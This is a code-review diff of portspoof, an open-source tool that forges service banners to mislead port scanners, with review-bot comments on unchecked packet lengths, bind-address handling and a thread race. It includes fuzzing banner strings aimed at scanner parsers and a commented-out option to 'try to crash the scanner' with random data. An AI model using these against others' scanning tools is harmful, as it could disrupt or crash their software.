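+* and distribute such a system following the terms of the GNU GPL for
+* portspoof and the licenses of the other code concerned.
+*
+* Note that people who make modified versions of portspoof are not obligated
+* to grant this special exception for their modified versions; it is their
+* choice whether to do so. The GNU General Public License gives permission
+* to release a modified version without this exception; this exception
+* also makes it possible to release a modified version which carries
+* forward this exception.
+*/
+
+
+
+#include <iostream>
+
+using namespace std;
+
+#include <sys/types.h>
+#include <pthread.h>
+#include <sys/timeb.h>
+#include <sys/wait.h>
+#include <err.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <signal.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <net/if.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/if_ether.h>
+#include <Windows.h>
+#include <winsock.h>
+
+
+
+#include "Packets.h"
+#include "PacketsManager.h"
+#include "Configuration.h"
+
+#define MAXBYTES2CAPTURE 1000
+
+PacketsManager* packetsmanager;
+Configuration* configuration;
+
+
+void packet_callback(u_char *useless,const struct pcap_pkthdr* pkthdr,const u_char* packet)
+{
+struct ip *ip;
+struct tcphdr *tcp;
+int ip_len;
+unsigned int ip_addr;
+
+ip = (struct ip*)(packet + sizeof(struct ether_header));
+ip_len = (ip->ip_hl & 0x0f) * 4;
+tcp = (struct tcphdr*)(packet + sizeof(struct ether_header) + ip_len);
+
+ip_addr=(unsigned int) ip->ip_src.s_addr;
+
+packetsmanager->addKnock(ip_addr,ntohs(tcp->th_dport),configuration);
+
+
+
+}
+
+int main(int argc, char** argv){
+
+pcap_t *descr = NULL;
+char errbuf[PCAP_ERRBUF_SIZE];
+memset(errbuf,0,PCAP_ERRBUF_SIZE);
+struct bpf_program fp; /* The compiled filter */
+bpf_u_int32 mask; /* Our netmask */
+bpf_u_int32 net; /* Our IP */
+
+configuration = new Configuration();
+
+if(configuration->readConfigFile())
+exit(1);
+
+if(configuration->processArgs(argc,argv))
+exit(1);
+
+packetsmanager = new PacketsManager();
+cout<<"Device: "<<configuration->getDevice().c_str()<<endl;
+cout<<"Filter: "<<configuration->getFilter().c_str()<<endl;
+
+
+/* Find the properties for the device */
+if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
+fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
+net = 0;
+mask = 0;
+}
+
+//promisc mode.
+if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1, 512, errbuf)) == NULL){
+fprintf(stdout,"ERROR: %s\n", errbuf);
+exit(1);
+}
+
+cout<<"Promisc mode set"<<endl;
+
+if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) {
+fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+exit(1);
+}
+if (pcap_setfilter(descr, &fp) == -1) {
+fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+exit(1);
+}
+
+cout<<"Listening..."<<endl;
+pcap_loop(descr,-1,packet_callback,NULL);
+return 0;
+}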
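Review bot: `packet_callback` casts `packet` to `struct ip` and then `struct tcphdr` without comparing `pkthdr->caplen` with the header sizes, and `ip_hl` is taken from the wire with no lower bound, so a truncated or malformed frame makes the `tcp->th_dport` read run past the captured bytes. The capture is opened in promiscuous mode, so such frames can come from any host on the segment. The callback should drop frames shorter than the Ethernet, IP and TCP headers together, and those whose `ip_hl` is below the minimum header size, before calling `addKnock`. The include list also pulls in `<Windows.h>` and `<winsock.h>` next to the POSIX headers, while no `<pcap.h>` include is visible in this file (it may come through `Packets.h`).

```cpp
void packet_callback(u_char *useless,const struct pcap_pkthdr* pkthdr,const u_char* packet)
{
    // … unchanged: local declarations …

    /* Refuse frames too short to hold an Ethernet and a minimal IP header. */
    if (pkthdr->caplen < sizeof(struct ether_header) + sizeof(struct ip))
        return;

    ip = (struct ip*)(packet + sizeof(struct ether_header));
    ip_len = (ip->ip_hl & 0x0f) * 4;

    /* ip_hl comes from the wire: enforce the minimum and re-check the length. */
    if (ip_len < (int)sizeof(struct ip) || ip->ip_p != IPPROTO_TCP)
        return;
    if (pkthdr->caplen < sizeof(struct ether_header) + ip_len + sizeof(struct tcphdr))
        return;

    // … unchanged: tcp pointer, ip_addr, addKnock call …
```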
4
src/src/nmapfuzzsignatures
Normal file
4
src/src/nmapfuzzsignatures
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 (__FUZZ__)
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures2
Normal file
1
src/src/nmapfuzzsignatures2
Normal file
@ -0,0 +1 @@
|
||||
550 4m2v4 (__FUZZ__/,8085/open/tcp//smtp/dupa/)\r\n
|
4
src/src/nmapfuzzsignatures3
Normal file
4
src/src/nmapfuzzsignatures3
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 __FUZZ__
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures4
Normal file
1
src/src/nmapfuzzsignatures4
Normal file
@ -0,0 +1 @@
|
||||
550 4m2v4 __FUZZ__
|
1
src/src/nmapfuzzsignatures_acu
Normal file
1
src/src/nmapfuzzsignatures_acu
Normal file
@ -0,0 +1 @@
|
||||
HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>
|
4
src/src/nmapfuzzsignatures_http
Normal file
4
src/src/nmapfuzzsignatures_http
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 (__FUZZ__)
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures_nessus
Normal file
1
src/src/nmapfuzzsignatures_nessus
Normal file
@ -0,0 +1 @@
|
||||
220 __FUZZ__ SMTP ready to roll\r\n
|
0
src/src/out.txt
Normal file
0
src/src/out.txt
Normal file
BIN
src/src/portspoof
Executable file
BIN
src/src/portspoof
Executable file
Binary file not shown.
53
src/src/portspoof.conf
Normal file
53
src/src/portspoof.conf
Normal file
@ -0,0 +1,53 @@
|
||||
#This is an example signature mapping configuration file
|
||||
|
||||
#Send custom payload (this can be a simple string)
|
||||
1 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
||||
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
|
||||
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
|
||||
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
|
||||
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
|
||||
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
|
||||
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
|
||||
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
|
||||
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
|
||||
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
|
||||
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
|
||||
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
|
||||
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
|
||||
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
|
||||
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
|
||||
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
|
||||
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
|
||||
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
|
||||
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
|
||||
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
|
||||
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
|
||||
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
|
||||
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
|
||||
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
|
||||
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
|
||||
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
|
||||
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
|
||||
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
|
||||
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
|
||||
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
|
||||
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
|
||||
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
|
||||
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
|
||||
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
|
||||
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
|
||||
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
|
||||
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
|
||||
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
|
||||
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
|
||||
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
|
||||
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
|
||||
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
||||
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
50 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
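--- a/src/src/portspoof.cpp
+++ b/src/src/portspoof.cpp
@@ -0,0 +1,227 @@
+/*
+* portspoof Service signature obfucastor
+* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+*
+* This program is free software; you can redistribute it and/or modify it
+* under the terms of the GNU General Public License as published by the
+* Free Software Foundation; either version 2 of the License, or (at your
+* option) any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+* See the GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License along
+* with this program; if not, see <http://www.gnu.org/licenses>.
+*
+* Linking portspoof statically or dynamically with other modules is making
+* a combined work based on portspoof. Thus, the terms and conditions of
+* the GNU General Public License cover the whole combination.
+*
+* In addition, as a special exception, the copyright holder of portspoof
+* gives you permission to combine portspoof with free software programs or
+* libraries that are released under the GNU LGPL. You may copy
+* and distribute such a system following the terms of the GNU GPL for
+* portspoof and the licenses of the other code concerned.
+*
+* Note that people who make modified versions of portspoof are not obligated
+* to grant this special exception for their modified versions; it is their
+* choice whether to do so. The GNU General Public License gives permission
+* to release a modified version without this exception; this exception
+* also makes it possible to release a modified version which carries
+* forward this exception.
+*/
+
+
+#include <sys/types.h>
+#include <pthread.h>
+#include <sys/timeb.h>
+#include <sys/wait.h>
+#include <err.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <signal.h>
+
+#include "revregex.h"
+#include "threads.h"
+#include "connection.h"
+#include "log.h"
+
+Configuration* configuration;
+
+pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER;
+pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER;
+
+
+int choose_thread()
+{
+int i=MAX_THREADS-1;
+int min = i;
+while(i >=0)
+{
+if(threads[i].client_count < threads[min].client_count)
+{
+min = i;
+}
+i--;
+}
+
+if(threads[min].client_count==MAX_CLIENT_PER_THREAD)
+return -1;
+
+return min;
+}
+
+int main(int argc, char **argv)
+{
+
+int sockd,newsockfd;
+int addrlen;
+//int pid;
+struct sockaddr_in my_name, peer_name;
+int status;
+
+
+configuration = new Configuration();
+
+if(configuration->processArgs(argc,argv))
+exit(1);
+
+if(configuration->processSignatureFile())
+exit(1);
+
+if(configuration->readConfigFile())
+exit(1);
+
+/*
+if(configuration->getConfigValue(OPT_FUZZ_NMAP))
+{
+if(configuration->PrepareFuzzer())
+{
+fprintf(stdout,"Fuzzer prepare failed!\n");
+fflush(stdout);
+exit(1);
+}
+
+fprintf(stdout,"-> Preparing fuzzer!\n");
+
+}
+*/
+
+
+//check log file
+if(configuration->getConfigValue(OPT_LOG_FILE))
+log_create(configuration->getLogFile().c_str());
+
+// open file
+if(configuration->getConfigValue(OPT_SIG_FILE))
+fprintf(stdout,"-> Using user defined signature file %s\n",configuration->getSignatureFile().c_str());
+fflush(stdout);
+
+/* create thread pool */
+for(int i = 0; i < MAX_THREADS; i++)
+{
+pthread_create(&threads[i].tid, NULL, &process_connection, (void *) i);
+threads[i].client_count = 0;
+}
+
+/* create a socket */
+sockd = socket(PF_INET, SOCK_STREAM, 0);
+if (sockd == -1)
+{
+perror("Socket creation error");
+exit(1);
+}
+
+int n = 1;
+setsockopt(sockd, SOL_SOCKET, SO_REUSEADDR , &n, sizeof(n));
+
+/* server address - by default localhost */
+my_name.sin_family = PF_INET;
+if(configuration->getConfigValue(OPT_IP))
+{
+fprintf(stdout,"-> Binding to iface: %s\n",configuration->getBindIP().c_str());
+inet_aton(configuration->getBindIP().c_str(), &my_name.sin_addr);
+
+}
+else
+my_name.sin_addr.s_addr = INADDR_ANY;
+
+if(configuration->getConfigValue(OPT_PORT))
+{
+fprintf(stdout,"-> Binding to port: %d\n",configuration->getPort());
+my_name.sin_port = htons(configuration->getPort());
+
+}
+else
+my_name.sin_port = htons(DEFAULT_PORT);
+
+status = bind(sockd, (struct sockaddr*)&my_name, sizeof(my_name));
+if (status == -1)
+{
+perror("Binding error");
+exit(1);
+}
+
+// Set queue sizeof
+status = listen(sockd, 10);
+if (status == -1)
+{
+perror("Listen set error");
+exit(1);
+}
+int choosen;
+while(1)
+{
+/* wait for a connection */
+addrlen = sizeof(peer_name);
+newsockfd = accept(sockd, (struct sockaddr*)&peer_name,(socklen_t*) &addrlen);
+
+
+if (newsockfd < 0)
+perror("ERROR on accept");
+else{
+
+nonblock(newsockfd);
+
+start:
+pthread_mutex_lock(&new_connection_mutex);
+choosen=choose_thread();
+
+
+if( choosen == -1)
+{
+pthread_mutex_unlock(&new_connection_mutex);
+sleep(1);
+goto start;
+}
+
+
+if(configuration->getConfigValue(OPT_DEBUG))
+fprintf(stdout," new conn - thread choosen: %d - nr. of connections already in queue: %d\n",choosen,threads[choosen].client_count);
+fflush(stdout);
+
+for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
+{
+if(threads[choosen].clients[i] == 0)
+{
+threads[choosen].clients[i] = newsockfd;
+threads[choosen].client_count++;
+break;
+}
+}
+pthread_mutex_unlock(&new_connection_mutex);
+}
+
+
+}
+
+return 0;
+}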
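Review bot: The return value of `inet_aton` is ignored in the `OPT_IP` branch of `main`, and `my_name` is never zeroed, so a malformed `-i` value leaves `sin_addr` holding whatever was on the stack and `bind` goes ahead with it. Reject the bad address instead, `if (inet_aton(configuration->getBindIP().c_str(), &my_name.sin_addr) == 0) { fprintf(stderr,"Invalid bind address\n"); exit(1); }`, and put `memset(&my_name, 0, sizeof(my_name));` before the fields are filled in. The comment above that block says the default is localhost, yet the `else` branch binds `INADDR_ANY`, which exposes the listener on every interface; the comment should say so. Separately, in the thread-pool loop `threads[i].client_count = 0;` runs after `pthread_create`, so a worker may already be reading the counter; moving the assignment above the create call closes that window.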
35
src/src/portspoof.h
Normal file
35
src/src/portspoof.h
Normal file
@ -0,0 +1,35 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
8
src/src/portspoof2.conf
Normal file
8
src/src/portspoof2.conf
Normal file
@ -0,0 +1,8 @@
|
||||
#TODO
|
||||
#Send message to Nmap scanners (will be visible as an extracted Banner )
|
||||
9000 NMAP:"What are you looking for?"
|
||||
|
||||
#Send random data on port 3000 (try to crash the scanner)
|
||||
#3000 random
|
||||
#Send random data on port 3001-3010 (try to crash the scanner)
|
||||
#3001-3010 random
|
663
src/src/revregex.cpp
Normal file
663
src/src/revregex.cpp
Normal file
@ -0,0 +1,663 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
#include "revregex.h"
|
||||
|
||||
int signatures[SIGNATURES_SIZE];
|
||||
int num_signatures=30;
|
||||
struct signature **arr_lines2;
|
||||
|
||||
char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen) //index: '[' ... ']'
|
||||
{
|
||||
//TODO hex support
|
||||
int bslash='\\';
|
||||
int word='w';
|
||||
int digit='d';
|
||||
int range='-';
|
||||
|
||||
//flags
|
||||
char nnot=0;
|
||||
char wordf=0;
|
||||
char digitf=0;
|
||||
char rangeword=0;
|
||||
char rangedigit=0;
|
||||
|
||||
//character pool
|
||||
char characters[255]={0,};
|
||||
int chari=0;
|
||||
char characterstmp[255]={0,};
|
||||
long character_class=0;
|
||||
|
||||
//skip first bracket char
|
||||
int i=start_offset+1;
|
||||
int lend_offset=end_offset;
|
||||
int tmpj;
|
||||
|
||||
if( str[i]=='^') //not flag
|
||||
{
|
||||
i++;nnot=1;
|
||||
}
|
||||
|
||||
// DEBUG
|
||||
//fprintf(stdout,"%d %d",i,end_offset);
|
||||
|
||||
for(i;i<lend_offset;i++)
|
||||
{
|
||||
|
||||
if( str[i]==bslash && i+1!=lend_offset ) //special chars - check if character class
|
||||
{
|
||||
if(str[i+1]=='c')
|
||||
character_class|=1<<1;
|
||||
else if(str[i+1]=='s')
|
||||
character_class|=2<<1;
|
||||
else if(str[i+1]=='S')
|
||||
character_class|=1<<3;
|
||||
else if(str[i+1]=='d')
|
||||
character_class|=1<<4;
|
||||
else if(str[i+1]=='D')
|
||||
character_class|=1<<5;
|
||||
else if(str[i+1]=='w')
|
||||
character_class|=1<<6;
|
||||
else if(str[i+1]=='W')
|
||||
character_class|=1<<7;
|
||||
else if(str[i+1]=='n')
|
||||
characters['\n']=1;
|
||||
else if(str[i+1]=='r')
|
||||
characters['\r']=1;
|
||||
else if(str[i+1]=='t')
|
||||
characters['\t']=1;
|
||||
else if(str[i+1]=='v')
|
||||
characters['\v']=1;
|
||||
else if(str[i+1]=='f')
|
||||
characters['\f']=1;
|
||||
else if(str[i+1]=='0')
|
||||
characters['\0']=1;
|
||||
else
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"unknown char: %c !\n", str[i+1]); //DEBUG - ignore this char it probably was escaped
|
||||
characters[str[i+1]]=1;
|
||||
}
|
||||
i++;
|
||||
|
||||
}
|
||||
else if( isalpha(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isalpha(str[i+2])) //check if rangeword
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"rangew");
|
||||
|
||||
//add chars from range to the pool
|
||||
tmpj=str[i];
|
||||
for(tmpj;tmpj<=str[i+2];tmpj++)
|
||||
{
|
||||
characters[tmpj]=1;
|
||||
}
|
||||
i+=3;
|
||||
rangeword=1;
|
||||
|
||||
}
|
||||
else if( isdigit(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isdigit(str[i+2])) //check if rangedigit
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"ranged");
|
||||
|
||||
tmpj=str[i];
|
||||
for(tmpj;tmpj<=str[i+2];tmpj++)
|
||||
{
|
||||
characters[tmpj]=1;
|
||||
}
|
||||
i+=3;
|
||||
rangedigit=1;
|
||||
|
||||
}
|
||||
else if(str[i]=='.')
|
||||
character_class|=1<<8;
|
||||
else if(str[i]=='|') //TODO: implement this
|
||||
character_class|=1<<9;
|
||||
else
|
||||
{
|
||||
//printf ("# [ char %c ]\n",str[i]);
|
||||
characters[str[i]]=1;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
char endmetachar=str[end_offset+1]; //TODO: should be ok unless one creates "[a-z]", which is invalid regex!
|
||||
int finsize=0;
|
||||
//srand (time(NULL) );
|
||||
|
||||
// fill character pool
|
||||
if(character_class & 1<<1)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<2)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<3)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<4)
|
||||
{
|
||||
int j='0';
|
||||
for(j;j<='9';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
}
|
||||
else if(character_class & 1<<5)
|
||||
{
|
||||
|
||||
|
||||
|
||||
}
|
||||
else if(character_class & 1<<6)
|
||||
{
|
||||
int j='a';
|
||||
for(j;j<='z';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
j='A';
|
||||
for(j;j<='Z';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
}
|
||||
else if(character_class & 1<<7)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<8)
|
||||
{
|
||||
/*
|
||||
int j=0;
|
||||
for(j;j<255;j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
characters['\n']=0;
|
||||
*/
|
||||
}
|
||||
else if(character_class & 1<<9)
|
||||
{
|
||||
|
||||
}
|
||||
|
||||
|
||||
// simple support - TODO to extend
|
||||
if(endmetachar=='*')
|
||||
finsize=rand()%10;
|
||||
else if(endmetachar =='+')
|
||||
finsize=1+rand()%9;
|
||||
|
||||
// DEBUG f
|
||||
//fprintf(stdout,"\n###\n");
|
||||
|
||||
|
||||
//TODO to be corrected
|
||||
i=0;
|
||||
for(i;i<255;i++)
|
||||
{
|
||||
if(nnot==0 && characters[i])
|
||||
{
|
||||
characterstmp[chari]=i;
|
||||
chari++;
|
||||
//fprintf(stdout,"%c",i);
|
||||
}
|
||||
else if(nnot && characters[i]==0)
|
||||
{
|
||||
characterstmp[chari]=i;
|
||||
chari++;
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
char *finstr=(char*)malloc((finsize+1)*sizeof(char));
|
||||
memset(finstr,0,(finsize+1)*sizeof(char));
|
||||
|
||||
if(chari)
|
||||
{
|
||||
int tmp;
|
||||
i=0;
|
||||
for(i;i<finsize;i++)
|
||||
{
|
||||
tmp=rand()%chari;
|
||||
finstr[i]=characterstmp[tmp];
|
||||
}
|
||||
}
|
||||
|
||||
*retlen=finsize;
|
||||
return finstr;
|
||||
}
|
||||
|
||||
char * fill_specialchars(char * str,int* param_len, int start_offset,int end_offset)
|
||||
{
|
||||
|
||||
int bslash='\\';
|
||||
int word='w';
|
||||
int digit='d';
|
||||
int dot='.';
|
||||
int newline='n';
|
||||
int creturn='r';
|
||||
int tab='t';
|
||||
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen=end_offset-start_offset;
|
||||
int tmpi=0;
|
||||
|
||||
|
||||
if (!(tmp = (char*)malloc(tmplen * sizeof(char))))
|
||||
exit(1);
|
||||
memset(tmp,0,tmplen);
|
||||
|
||||
|
||||
int i=start_offset;
|
||||
|
||||
for(i;i<end_offset;i++)
|
||||
{
|
||||
if(str[i]==bslash && i+1!=end_offset && str[i+1]==word )
|
||||
{
|
||||
tmp[tmpi]=97+rand()%25;
|
||||
tmpi++;
|
||||
i++;
|
||||
|
||||
if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
|
||||
i++;
|
||||
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==digit )
|
||||
{
|
||||
tmp[tmpi]=48+rand()%10;
|
||||
tmpi++;
|
||||
i++;
|
||||
|
||||
if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
|
||||
i++;
|
||||
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==newline )
|
||||
{
|
||||
tmp[tmpi]='\n';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==creturn )
|
||||
{
|
||||
tmp[tmpi]='\r';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
|
||||
{
|
||||
tmp[tmpi]='\t';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
|
||||
tmp[tmpi]=97+rand()%25;
|
||||
tmpi++;
|
||||
}
|
||||
else
